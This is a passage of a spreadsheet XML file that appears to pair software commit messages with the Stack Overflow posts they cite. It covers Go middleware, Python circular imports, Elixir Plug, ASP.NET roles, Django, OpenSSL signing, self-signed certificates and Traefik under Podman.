	getR.HandleFunc("/refresh-token", Adapt(
		http.HandlerFunc(RefreshToken),
		MethodLogger(),
		ValidateRefreshToken("Vikee-Request-Token"),
	).ServeHTTP)
	srv := &amp;http.Server{
		Handler:      sm,
		Addr:         "localhost:8888",
		WriteTimeout: 30 * time.Second,
		ReadTimeout:  30 * time.Second,
	}
	log.Fatalln(srv.ListenAndServe())
}
The Adapt function lets you chain multiple handlers together. I've demonstrated 2 middleware funcs (ValidateRefreshToken and MethodLogger). The middleware are basically closures. You can use this method with any framework that accepts http.Handler such as mux and chi.</t>
  </si>
  <si>
    <t>The solution provided by notorious.no also works perfectly for the given requirement. Also i came across another solution which uses PathPrefix and solves the same issue and would like to get suggestions for the same.
    // create a serve mux
	sm := mux.NewRouter()
	// register handlers
	postR := sm.Methods(http.MethodPost).Subrouter()
	postR.HandleFunc("/signup", uh.Signup)
	postR.HandleFunc("/login", uh.Login)
	postR.Use(uh.MiddlewareValidateUser)
	refToken := sm.PathPrefix("/refresh-token").Subrouter()
	refToken.HandleFunc("", uh.RefreshToken)
	refToken.Use(uh.MiddlewareValidateRefreshToken)
	getR := sm.Methods(http.MethodGet).Subrouter()
	getR.HandleFunc("/greet", uh.Greet)
	getR.Use(uh.MiddlewareValidateAccessToken)
Came to this solution using the reference : https://github.com/gorilla/mux/issues/360</t>
  </si>
  <si>
    <t xml:space="preserve">We are about to start a new part of the project and there doesn't seem to be a lot of interest in unit testing (and it doesn't feel like they have experienced TDD). I believe it's nearly essential and it makes maintainance much easier.
So what are your views?
Thanks
BTW: this is a language agnostic question, however the new project is in Java.
</t>
  </si>
  <si>
    <t>C179</t>
  </si>
  <si>
    <t>Want Users to have username email password (userId), with unique:true
 for the username &amp; email. That is Layer 1.
On Layer 2, isPolitician (anything with is is a boolean), has Name PhoneNumber Address (County State), and is constructed from top to bottom where First Name (since we are on Layer 2) is Middle Name/initial, Last Name is Title, Position, inOffice, State/Territory, Phone#, Address, (politicianId), identityProof (img), [2 Factor Auth.] ties back to Phone # &amp; the Layer 1 username &amp; email.
[verification] Layer 3 is where the [2 Factor Auth.] points to Bio-choose what info you want to display on your profile.
ugh so when i try console logging req.body._id I get unefined, tryna get the id of the user I'm currently logged in as.
req.params holds all the values based on your url parameters...so for urls based of router.put("/:id", somefunc()) you will find it like req.params.id and same with router.put("/:tuna", anotherfunc()) req.params.tuna –jo A Jan 19 at 5:17
https://stackoverflow.com/questions/75166530/i-am-trying-to-update-my-user-schema-in-a-create-profile-page-after-registerin/75167462?noredirect=1#comment132645030_75167462
I don't get it. Did you send jwt token to the client in the register response? – Konrad
Could you elaborate are you referring to the cookie carrying the jwt token? – deangladish
Yes, you should get the user information like username from that token – Konrad
https://stackoverflow.com/questions/75165712/how-to-implement-the-back-end-of-an-edit-profile-page?noredirect=1#comment132641710_75165712</t>
  </si>
  <si>
    <t>Updates are generally done with put request where you would pass in a certain id to the url like
router.put("/:id", (req,res) =&gt; { 
      "do something..."
}
You would have the do the same with axios if I remember correctly (axios.put())
I would also probably separate creating and updating functionality on the front end. So just like your have firstName and setFirstName, create nameUpdate setNameUpdate and handle like so</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Weâ€™re encountering an issue with link previews for dynamic URLs in Threads. We use dynamic URLs in the ?slug=... format
The previews work fine on other platforms like Facebook and Instagram, but theyâ€™re not showing up in Threads. Weâ€™ve set up the Open Graph tags as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;meta property=&amp;quot;og:type&amp;quot; content=&amp;quot;article&amp;quot; /&amp;gt;
&amp;lt;meta property=&amp;quot;og:title&amp;quot; content=&amp;quot;&amp;quot; /&amp;gt;
&amp;lt;meta property=&amp;quot;og:description&amp;quot; content=&amp;quot;&amp;quot; /&amp;gt;
&amp;lt;meta property=&amp;quot;og:image&amp;quot; content=&amp;quot;&amp;quot; /&amp;gt;
&amp;lt;meta property=&amp;quot;og:image:width&amp;quot; content=&amp;quot;&amp;quot; /&amp;gt;
&amp;lt;meta property=&amp;quot;og:image:height&amp;quot; content=&amp;quot;&amp;quot; /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Despite the correct setup, the preview doesnâ€™t display in Threads. We also used the Facebook Sharing Debugger to clear the cache, which helped on other platforms (e.g., Twitter), but didnâ€™t fix the issue in Threads.&lt;/p&gt;
&lt;p&gt;Additionally, we have a question about user-agents. We use the following user-agents for processing links on various platforms:&lt;/p&gt;
&lt;p&gt;Slackbot
Discordbot
Skype
Teams
bingbot
Googlebot
LinkedInBot
vk
MicroMessenger
Weâ€™ve noticed that Threads doesnâ€™t seem to have its own user-agent.&lt;/p&gt;
&lt;p&gt;Here are the question weâ€™d like to discuss:&lt;/p&gt;
&lt;p&gt;What steps can we take to resolve the issue with link previews not displaying?&lt;/p&gt;
&lt;p&gt;We attempted to re-scrape the website using the Facebook Debugger tool at &lt;a href="https://developers.facebook.com/tools/debug/" rel="nofollow noreferrer"&gt;https://developers.facebook.com/tools/debug/&lt;/a&gt;, which worked for Facebook.
We also tried increasing the image size for the preview, but that didnâ€™t help either.&lt;/p&gt;
&lt;p&gt;Itâ€™s important to note that this issue only occurs in Threads&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C18</t>
  </si>
  <si>
    <t>Circular (or cyclic) import problem occurred in doctest of rdkit_utils.py. While running doctest on deepchem/utils/rdkit_utils.py, an error occurred which suggested that may be, the file: deepchem/utils/typing.py having the same name as the module it imports (typing), is causing the circular (or cyclic) import problem (...) Expected behavior: There should not be any problem importing type annotations from the typing module or importing from the deepchem.utils.typing file https://stackoverflow.com/questions/744373/circular-or-cyclic-imports-in-python. (\href{https://tinyurl.com/275k7x3s}{Commit Link})</t>
  </si>
  <si>
    <t>If you do import foo (inside bar.py) and import bar (inside foo.py), it will work fine. By the time anything actually runs, both modules will be fully loaded and will have references to each other.
The problem is when instead you do from foo import abc (inside bar.py) and from bar import xyz (inside foo.py). Because now each module requires the other module to already be imported (so that the name we are importing exists) before it can be imported.
Examples of working circular imports in Python 2 and Python 3
The article When are Python circular imports fatal? gives four examples when circular imports are, for the reason explained above, nonfatal.
Top of module; no from; Python 2 only
# lib/foo.py                         # lib/bar.py
import bar                           import foo
def abc():                           def xyz():
    print(bar.xyz.__name__)              print(foo.abc.__name__)
Top of module; from ok; relative ok; Python 3 only
# lib/foo.py                         # lib/bar.py
from . import bar                    from . import foo
def abc():                           def xyz():
    print(bar.xyz.__name__)              print(abc.__name__)
Top of module; no from; no relative
# lib/foo.py                         # lib/bar.py
import lib.bar                       import lib.foo
def abc():                           def xyz():
    print(lib.bar.xyz.__name__)          print(lib.foo.abc.__name__)
Bottom of module; import attribute, not module; from okay
# lib/foo.py                         # lib/bar.py
def abc():                           def xyz():
    print(xyz.__name__)                  print(abc.__name__)
from .bar import xyz                 from .foo import abc
Top of function; from okay
# lib/foo.py                         # lib/bar.py
def abc():                           def xyz():
    from . import bar                    from . import foo
    print(bar.xyz.__name__)              print(foo.abc.__name__)
Additional examples
The article cited above does not discuss star imports.</t>
  </si>
  <si>
    <t xml:space="preserve">I've joined a team that works on a product. This product has been around for ~5 years or so, and uses ASP.NET WebForms. Its original architecture has faded over time, and things have become relatively disorganized throughout the solution. It's by no means terrible, but definitely can use some work; you all know what I mean.
I've been performing some refactorings since coming on to the project team about 6 months ago. Some of those refactorings are simple, Extract Method, Pull Method Up, etc. Some of the refactorings are more structural. The latter changes make me nervous as there isn't a comprehensive suite of unit tests to accompany every component. 
The whole team is on board for the need to make structural changes through refactoring, but our Project Manager has expressed some concerns that we don't have adequate tests to make refactorings with the confidence that we aren't introducing regression bugs into the system. He would like us to write more tests first (against the existing architecture), then perform the refactorings. My argument is that the system's class structure is too tightly coupled to write adequate tests, and that using a more Test Driven approach while we perform our refactorings may be better. What I mean by this is not writing tests against the existing components, but writing tests for specific functional requirements, then refactoring existing code to meet those requirements. This will allow us to write tests that will probably have more longevity in the system, rather than writing a bunch of 'throw away' tests.
Does anyone have any experience as to what the best course of action is? I have my own thoughts, but would like to hear some input from the community.
</t>
  </si>
  <si>
    <t>C180</t>
  </si>
  <si>
    <t>fix Security and Authorization
thanks https://stackoverflow.com/questions/41510957/read-the-raw-body-from-a-plug-connection-after-parsers-in-elixir
change library</t>
  </si>
  <si>
    <t>Copied from my answer here.
You can pass a custom :body_reader option to Plug.Parsers in order to cache the body for later use.
You'll want to not read the body before the Parser and instead cache the body to read later from your plug that wants to hash it.
Option:
:body_reader - an optional replacement (or wrapper) for Plug.Conn.read_body/2  to provide a function that gives access to the raw body before it is parsed and discarded. It is in the standard format of {Module, :function, [args]} (MFA) and defaults to {Plug.Conn, :read_body, []}.
Example:
Sometimes you may want to customize how a parser reads the body from the connection. For example, you may want to cache the body to perform verification later, such as HTTP Signature Verification. This can be achieved with a custom body reader that would read the body and store it in the connection, such as:
defmodule CacheBodyReader do
  def read_body(conn, opts) do
    {:ok, body, conn} = Plug.Conn.read_body(conn, opts)
    conn = update_in(conn.assigns[:raw_body], &amp;[body | (&amp;1 || [])])
    {:ok, body, conn}
  end
end
which could then be set as:
plug Plug.Parsers,
  parsers: [:urlencoded, :json],
  pass: ["text/*"],
  body_reader: {CacheBodyReader, :read_body, []},
  json_decoder: Jason
It was added in Plug v1.5.1.</t>
  </si>
  <si>
    <t xml:space="preserve">Now that everyone is talking about MVC, I notice that the business rules are not being addressed. In the old days of the 3-tier architecture, The business rules were in the middle layer. Where do they fall in the new MVC?
</t>
  </si>
  <si>
    <t>C181</t>
  </si>
  <si>
    <t>fix authorization on JWT token
see https://stackoverflow.com/questions/52526186 and https://stackoverflow.com/questions/60184703 for reference.</t>
  </si>
  <si>
    <t xml:space="preserve">How to fix
However, decorating a controller with a role will always return not authorized
  [Authorize(Roles = "Administrator")]
It's a known bug in the version of 2.1 . See issue here .
I follow the advice of using the old api suggested by HaoK and C-BERBER , and it now works flawlessly .
Here's my DbContext:
public class ApplicationDbContext : IdentityDbContext&lt;AppUser,IdentityRole,string&gt;
{
    public ApplicationDbContext(DbContextOptions&lt;ApplicationDbContext&gt; options)
        : base(options)
    {
    }
}
Configure the identity using the old-style api :
services.AddIdentity&lt;AppUser, IdentityRole&gt;()
        .AddRoleManager&lt;RoleManager&lt;IdentityRole&gt;&gt;()
        .AddDefaultUI()
        .AddDefaultTokenProviders()
        .AddEntityFrameworkStores&lt;ApplicationDbContext&gt;();
Lastly , logout and re-signin , it will work as expected now .
How to Debug source code
I guess you won't want to debug the AuthorizeAttribe itself , since it is processed at compile-time . If you mean to debug the AuthorizeFilter , you can follow the steps as below :
click Tools -&gt; Options -&gt; Debugging
within General , unselect the Enable Just My Code in Visual Studio
select Enable Source Link Support
within Symbols , make sure that the Microsoft Symbol Servers is selected
And you can debug the source code now . However , due to the way that filter works , you need set a breakpoint before MVC . I just set a dummy middleware that will take place before the MVC router handler :
The screenshot of debugging AuthorizeFiler :
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am making a dashboard website where I have a canvas having a pie chart as in image below.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/6SpAAXBM.png" rel="nofollow noreferrer"&gt;screenshot of dashboard&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I am exporting image of canvas using &lt;strong&gt;html-to-image&lt;/strong&gt; library and as pdf using &lt;strong&gt;jspdf&lt;/strong&gt; library using the following code.&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;useEffect(() =&amp;gt; {
    if (pageSettings.callForDownload) {
      const input = document.getElementById(
        &amp;quot;GraphAreaToDownload&amp;quot;
      ) as HTMLElement;
      const d = new Date();
      const id = `${tabTileProps.selectedTabName}_${d.getDate()}${d.getMonth() + 1
        }${d.getFullYear()}:${d.getHours()}${d.getMinutes()}${d.getSeconds()}`;
      if (pageSettings.downloadType === &amp;quot;pdf&amp;quot;) {
           // exporting for pdf
        html2canvas(input).then((canvas) =&amp;gt; {
          const imageData = canvas.toDataURL(&amp;quot;image/png&amp;quot;);
          const pdf = new jsPDF(
            pageSettings.SelectedOrientation,
            &amp;quot;px&amp;quot;,
            pageSettings.selectedFormat
          );
          var width = pdf.internal.pageSize.getWidth();
          var height = pdf.internal.pageSize.getHeight();
          const heightAndWidth = getHeightAndWidth(height, width);
          pdf.addImage(
            imageData,
            &amp;quot;JPEG&amp;quot;,
            pageSettings.left_margin,
            pageSettings.top_margin,
            heightAndWidth.width,
            heightAndWidth.height
          );
          pdf.save(`${id}`);
          resetPageSettings();
        });
      } else {
           //exporting for image
        toPng(input, { cacheBust: true })
          .then((dataUrl: any) =&amp;gt; {
            const link = document.createElement(&amp;quot;a&amp;quot;);
            link.download = `${id}`;
            link.href = dataUrl;
            link.click();
            resetPageSettings();
          })
          .catch((err: any) =&amp;gt; {
            Logger(&amp;quot;error&amp;quot;, &amp;quot;&amp;quot;, err);
          });
      }
    }
  }, [pageSettings.callForDownload]);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Exporting as pdf works fine whereas pie chart is getting cropped in exporting as image.
Below are the exported outcomes.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/Qs5Yvwgn.png" rel="nofollow noreferrer"&gt;exported as image&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/loELsu9F.png" rel="nofollow noreferrer"&gt;exported as pdf&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I tried tinkering with padding and margin but the image was still cropped. I expect the export as an image to show full pie chart similar to export as pdf.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C182</t>
  </si>
  <si>
    <t>address django.http.request.RawPostDataException
accessing request.body seems to be causing this exception:
django.http.request.RawPostDataException: You cannot access body after
reading from request's data stream
This may be b/c the middleware is already accessing the data stream,
see https://stackoverflow.com/questions/19581110</t>
  </si>
  <si>
    <t>Use request.data instead of request.body.
request.data does not read the data stream again.</t>
  </si>
  <si>
    <t xml:space="preserve">In the Java world, there are a few more choices for message queues, but in .Net, there are only a few. When evaluating which one to use, what are some characteristics one should look for? What are the fundamental concepts that make up a reliable message queueing system?
</t>
  </si>
  <si>
    <t>C183</t>
  </si>
  <si>
    <t>openssl: Sign and file and verify against the signature
https://stackoverflow.com/questions/10782826/digital-signature-for-a-file-using-openssl</t>
  </si>
  <si>
    <t>Yes, the dgst and rsautl component of OpenSSL can be used to compute a signature given an RSA key pair.
Signing:
openssl dgst -sha256 data.txt &gt; hash
openssl rsautl -sign -inkey privatekey.pem -keyform PEM -in hash &gt;signature
Verifying just the signature:
openssl rsautl -verify -inkey publickey.pem -pubin -keyform PEM -in signature
Update: Capturing Reto's comments from below because this is an important nuance.  Presumably if you are going to the trouble to verify, you want to know the signature was produced on the plaintext to which it is attached:
This might sound obvious for some but: Be aware, rsautl verify just decrypts the file signature. The output of this call is guaranteed to be produced by the owner of the private key, but beside that nothing else is being checked. So to actually verify the consistency of data.txt you have to regenerate the digest and then compare it against the output of openssl rsautl -verify.
Verifying that the owner of the private key does vouch for data.txt:
openssl dgst -sha256 -verify publickey.pem -signature signature data.txt
For this operation, openssl requires the public key, the signature, and the message.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently having a problem with accessing the host system from a Podman Container running Traefik.&lt;/p&gt;
&lt;p&gt;I am running this on a Fedora Server &lt;strong&gt;Fedora release 40 (Forty)&lt;/strong&gt; with &lt;strong&gt;Podman 5.3.1&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I am spawning the container from a Quadlet file. It looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Unit]
Description=Traefik â€“Â Reverse Proxy and Load Balancer
Wants=network.target
After=network.target
[Container]
ContainerName=traefik
Image=docker.io/traefik:v3.0
PublishPort=80:80
PublishPort=443:443
PublishPort=8080:8080
Network=proxy
Volume=${TRAEFIK_SERVICE_PATH}/data/config/traefik.yml:/etc/traefik/traefik.yml:Z
Volume=${TRAEFIK_SERVICE_PATH}/data/config/sys-net-visible.yml:/etc/traefik/sys-net-visible.yml:Z
Volume=${TRAEFIK_SERVICE_PATH}/data/letsencrypt/acme.json:/letsencrypt/acme.json:Z
Volume=${TRAEFIK_SERVICE_PATH}/data/users/:/users/:Z
Volume=/run/user/%U/podman/podman.sock:/var/run/docker.sock:z
# Security option
SecurityLabelType=container_runtime_t
# Labels for Traefik
Label=traefik.enable=true
Label=traefik.http.routers.traefik.rule=Host(`${HOST}`)
Label=traefik.http.routers.traefik.service=api@internal
Label=traefik.http.routers.traefik.tls=true
Label=traefik.http.routers.traefik.tls.certresolver=production
Label=&amp;quot;traefik.http.routers.traefik.entrypoints=web, websecure&amp;quot;
Label=traefik.http.routers.traefik.middlewares=authtraefik
Label=traefik.http.middlewares.authtraefik.basicauth.usersfile=/users/users.txt
[Service]
Restart=always
Environment=TRAEFIK_SERVICE_PATH=%h/services/infrastructure/traefik
EnvironmentFile=%h/services/infrastructure/traefik/.env
[Install]
WantedBy=multi-user.target default.target
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I want to use Traefik to proxy also a web server that is running on the host in addition to some containers. For that I want to use a static configuration that sets a provider and service to &lt;code&gt;host.containers.internal:8000&lt;/code&gt; to make the service accessible to Traefik.&lt;/p&gt;
&lt;p&gt;The Traefik config looks like this:&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;global:
  checkNewVersion: false
  sendAnonymousUsage: false
log:
  level: DEBUG
  format: common
  filePath: /var/log/traefik/traefik.log
api:
  dashboard: true
entryPoints:
  web:
    address: &amp;quot;:80&amp;quot;
    http:
      redirections:
        entryPoint:
          to: websecure
          scheme: https
  websecure:
    address: &amp;quot;:443&amp;quot;
certificatesResolvers:
  staging:
    acme:
      email: YOUR_EMAIL
      storage: /letsencrypt/acme.json
      caServer: &amp;quot;https://acme-staging-v02.api.letsencrypt.org/directory&amp;quot;
      httpChallenge:
        entryPoint: web
  production:
    acme:
      email: YOUR_EMAIL
      storage: /letsencrypt/acme.json
      caServer: &amp;quot;https://acme-v02.api.letsencrypt.org/directory&amp;quot;
      httpChallenge:
        entryPoint: web
providers:
  docker:
    exposedByDefault: false
    endpoint: &amp;quot;unix:///var/run/docker.sock&amp;quot;
    network: &amp;quot;proxy&amp;quot;
  file:
    filename: /etc/traefik/web-server.yml
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And this is the static server configuration for Traefik:&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;http:
  routers:
    web-server:
      rule: &amp;quot;Host(`web-server.example.org`)&amp;quot;
      service: &amp;quot;web-server&amp;quot;
      entryPoints:
        - &amp;quot;websecure&amp;quot;
      tls:
        certResolver: production
  services:
    web-server:
      loadBalancer:
        servers:
          - url: &amp;quot;http://host.containers.internal:8000&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Eventhough I can ping the &lt;code&gt;host.containers.internal&lt;/code&gt; from inside the Traefik container it does not work as a proxy.&lt;/p&gt;
&lt;p&gt;Also using curl to get the website on the port is not working from inside the Traefik container.&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;$ podman exec traefik ping host.containers.internal
PING host.containers.internal (178.254.24.177): 56 data bytes
64 bytes from 178.254.24.177: seq=0 ttl=42 time=0.175 ms
64 bytes from 178.254.24.177: seq=1 ttl=42 time=0.093 ms
64 bytes from 178.254.24.177: seq=2 ttl=42 time=0.106 ms
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;$ podman exec traefik curl host.containers.internal:8000
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
curl: (7) Failed to connect to host.containers.internal port 8000 after 0 ms: Could not connect to server
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I reached the point where I truly do not know how to solve this problem. Does anyone has any tips or tricks to make this setup work?&lt;/p&gt;
&lt;p&gt;Thanks and have a good day! â˜€ï¸&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C184</t>
  </si>
  <si>
    <t>create ssl authority
found on stackoverflow
https://stackoverflow.com/questions/7580508/getting-chrome-to-accept-self-signed-localhost-certificate/43666288#43666288
worked for me on CentOS 7, openssl and ords 18.1</t>
  </si>
  <si>
    <t>On the Mac, you can create a certificate that's fully trusted by Chrome and Safari at the system level by doing the following:
# create a root authority cert
./create_root_cert_and_key.sh
# create a wildcard cert for mysite.com
./create_certificate_for_domain.sh mysite.com
# or create a cert for www.mysite.com, no wildcards
./create_certificate_for_domain.sh www.mysite.com www.mysite.com
The above uses the following scripts, and a supporting file v3.ext, to avoid subject alternative name missing errors
If you want to create a new self signed cert that's fully trusted using your own root authority, you can do it using these scripts.
create_root_cert_and_key.sh
#!/usr/bin/env bash
openssl genrsa -out rootCA.key 2048
openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem
create_certificate_for_domain.sh
#!/usr/bin/env bash
if [ -z "$1" ]
then
  echo "Please supply a subdomain to create a certificate for";
  echo "e.g. www.mysite.com"
  exit;
fi
if [ ! -f rootCA.pem ]; then
  echo 'Please run "create_root_cert_and_key.sh" first, and try again!'
  exit;
fi
if [ ! -f v3.ext ]; then
  echo 'Please download the "v3.ext" file and try again!'
  exit;
fi
# Create a new private key if one doesnt exist, or use the xeisting one if it does
if [ -f device.key ]; then
  KEY_OPT="-key"
else
  KEY_OPT="-keyout"
fi
DOMAIN=$1
COMMON_NAME=${2:-*.$1}
SUBJECT="/C=CA/ST=None/L=NB/O=None/CN=$COMMON_NAME"
NUM_OF_DAYS=825
openssl req -new -newkey rsa:2048 -sha256 -nodes $KEY_OPT device.key -subj "$SUBJECT" -out device.csr
cat v3.ext | sed s/%%DOMAIN%%/"$COMMON_NAME"/g &gt; /tmp/__v3.ext
openssl x509 -req -in device.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out device.crt -days $NUM_OF_DAYS -sha256 -extfile /tmp/__v3.ext 
# move output files to final filenames
mv device.csr "$DOMAIN.csr"
cp device.crt "$DOMAIN.crt"
# remove temp file
rm -f device.crt;
echo 
echo "###########################################################################"
echo Done! 
echo "###########################################################################"
echo "To use these files on your server, simply copy both $DOMAIN.csr and"
echo "device.key to your webserver, and use like so (if Apache, for example)"
echo 
echo "    SSLCertificateFile    /path_to_your_files/$DOMAIN.crt"
echo "    SSLCertificateKeyFile /path_to_your_files/device.key"
v3.ext
authorityKeyIdentifier=keyid,issuer
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment, dataEncipherment
subjectAltName = @alt_names
[alt_names]
DNS.1 = %%DOMAIN%%
One more step - How to make the self signed certs fully trusted in Chrome/Safari
To allow the self signed certificates to be FULLY trusted in Chrome and Safari, you need to import a new certificate authority into your Mac. To do so follow these instructions, or the more detailed instructions on this general process on the mitmproxy website:
You can do this one of 2 ways, at the command line, using this command which will prompt you for your password:
$ sudo security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain rootCA.pem
or by using the Keychain Access app:
Open Keychain Access
Choose "System" in the "Keychains" list
Choose "Certificates" in the "Category" list
Choose "File | Import Items..."
Browse to the file created above, "rootCA.pem", select it, and click "Open"
Select your newly imported certificate in the "Certificates" list.
Click the "i" button, or right click on your certificate, and choose "Get Info"
Expand the "Trust" option
Change "When using this certificate" to "Always Trust"
Close the dialog, and you'll be prompted for your password.
Close and reopen any tabs that are using your target domain, and it'll be loaded securely!
and as a bonus, if you need java clients to trust the certificates, you can do so by importing your certs into the java keystore. Note this will remove the cert from the keystore if it already exists, as it needs to update it in case things change. It of course only does this for the certs being imported.
import_certs_in_current_folder_into_java_keystore.sh
KEYSTORE="$(/usr/libexec/java_home)/jre/lib/security/cacerts";
function running_as_root()
{
  if [ "$EUID" -ne 0 ]
    then echo "NO"
    exit
  fi
  echo "YES"
}
function import_certs_to_java_keystore
{
  for crt in *.crt; do 
    echo prepping $crt 
    keytool -delete -storepass changeit -alias alias__${crt} -keystore $KEYSTORE;
    keytool -import -file $crt -storepass changeit -noprompt --alias alias__${crt} -keystore $KEYSTORE
    echo 
  done
}
if [ "$(running_as_root)" == "YES" ]
then
  import_certs_to_java_keystore
else
  echo "This script needs to be run as root!"
fi</t>
  </si>
  <si>
    <t xml:space="preserve">Consider a standard ASP.NET web application where the user types in some numeric data on a form.  On submitting, some business objects are spun up to operate on the numeric data.  But server-side textbox controls in .Net return a value of type string.  Question: Should the codebehind of the page take responsibility for parsing the strings into numeric data (and throwing errors if invalid), or should the business objects accept strings for their input and parse them themselves?
</t>
  </si>
  <si>
    <t>C185</t>
  </si>
  <si>
    <t>refactor login with google to email and pasword
more info:
https://stackoverflow.com/a/28422909/11001796
wanted to limit users who log into the app using firebase login with google provider, but it seems firebase cant realy do that, since it is more of authentication than authorization implmentation, unless some read write rules are set which is complex as of this commit, not time to do all that, so lets move to firebase auth with email and password, more control here :)</t>
  </si>
  <si>
    <t>Firebase's authentication handles only that: the authentication of users through any of the mechanisms you enable. Whether those users have access to your data is called authorization and it is handled through the security rules of your Firebase.
So:
Authentication allows the user to identify him/herself with your application. See Firebase's documentation on authentication (for JavaScript/Web, but it exists for all supported platforms).
Authorization limits read/write access to your data to specific users, based on their authentication. See Firebase's documentation on its security rules.
Limiting access to your data to specific email addresses is certainly possible. I recommend that you read Firebase's documentation on its security rules and try to make it work based on that. If you have any problems, post what you've tried and we'll be able to help you better.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a notify dublication when AppState.ErrorMessage changes such as AppState.ErrorMessage = &amp;quot;Some error&amp;quot;.
When I click the button, where I set value, I receive notificaiton two times&lt;/p&gt;
&lt;p&gt;MainLayout&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class MainLayout : IDisposable
{
    [Inject]
    public required INotificationService Notice { get; set; }
    [CascadingParameter]
    public ApplicationState? AppState { get; set; }
    protected override async Task OnAfterRenderAsync(bool firstRender)
    {
        if (firstRender &amp;amp;&amp;amp; AppState is not null)
        {
            AppState.OnNotification += OnNotificationHandler;
        }
        await base.OnAfterRenderAsync(firstRender);
    }
    public void Dispose()
    {
        if (AppState is not null)
        {
            AppState.OnNotification -= OnNotificationHandler;
        }
    }
    private void OnNotificationHandler()
    {
        InvokeAsync(ShowNotification);
    }
    private async Task ShowNotification()
    {
        if (AppState is not null)
        {
            await Notice.Error(new NotificationConfig()
            {
                Message = AppState.ErrorMessage
            });
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ApplicationState&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class ApplicationState
{
    private string _errorMessage = string.Empty;
    public string ErrorMessage
    {
        get =&amp;gt; _errorMessage;
        set
        {
            if (!string.Equals(_errorMessage, value) &amp;amp;&amp;amp;  !string.IsNullOrWhiteSpace(value))
            {
                _errorMessage = value;
                ShowError();
            }
            else
            {
                _errorMessage = value;
            }
        }
    }
    public event Action? OnNotification;
    public void ShowError()
    {
        OnNotification?.Invoke();
        _errorMessage = string.Empty;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I did&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Implemented a notification flag&lt;/li&gt;
&lt;li&gt;cleaned an error message&lt;/li&gt;
&lt;li&gt;introduced event subscription management.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Maybe the problem is with rendermode?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;head&amp;gt;
    &amp;lt;meta charset=&amp;quot;utf-8&amp;quot; /&amp;gt;
    &amp;lt;meta name=&amp;quot;viewport&amp;quot; content=&amp;quot;width=device-width, initial-scale=1.0&amp;quot; /&amp;gt;
    &amp;lt;base href=&amp;quot;/&amp;quot; /&amp;gt;
    &amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;@Assets[&amp;quot;lib/bootstrap/dist/css/bootstrap.min.css&amp;quot;]&amp;quot; /&amp;gt;
    &amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;@Assets[&amp;quot;app.css&amp;quot;]&amp;quot; /&amp;gt;
    &amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;@Assets[&amp;quot;Client.styles.css&amp;quot;]&amp;quot; /&amp;gt;
    &amp;lt;ImportMap /&amp;gt;
    &amp;lt;link rel=&amp;quot;icon&amp;quot; type=&amp;quot;image/png&amp;quot; href=&amp;quot;favicon.png&amp;quot; /&amp;gt;
    &amp;lt;HeadOutlet @rendermode=&amp;quot;new InteractiveServerRenderMode(prerender: false)&amp;quot; /&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;Routes @rendermode=&amp;quot;new InteractiveServerRenderMode(prerender: false)&amp;quot; /&amp;gt;
    &amp;lt;AntContainer @rendermode=&amp;quot;new InteractiveServerRenderMode(prerender: false)&amp;quot; /&amp;gt;
    &amp;lt;script src=&amp;quot;_framework/blazor.web.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C186</t>
  </si>
  <si>
    <t>Trying to fix bad decrypt by encrypting using openssl 1.1 and -md sha256 on encrypt and decrypt as proposed here:
https://stackoverflow.com/questions/34304570/how-to-resolve-the-evp-decryptfinal-ex-bad-decrypt-during-file-decryption
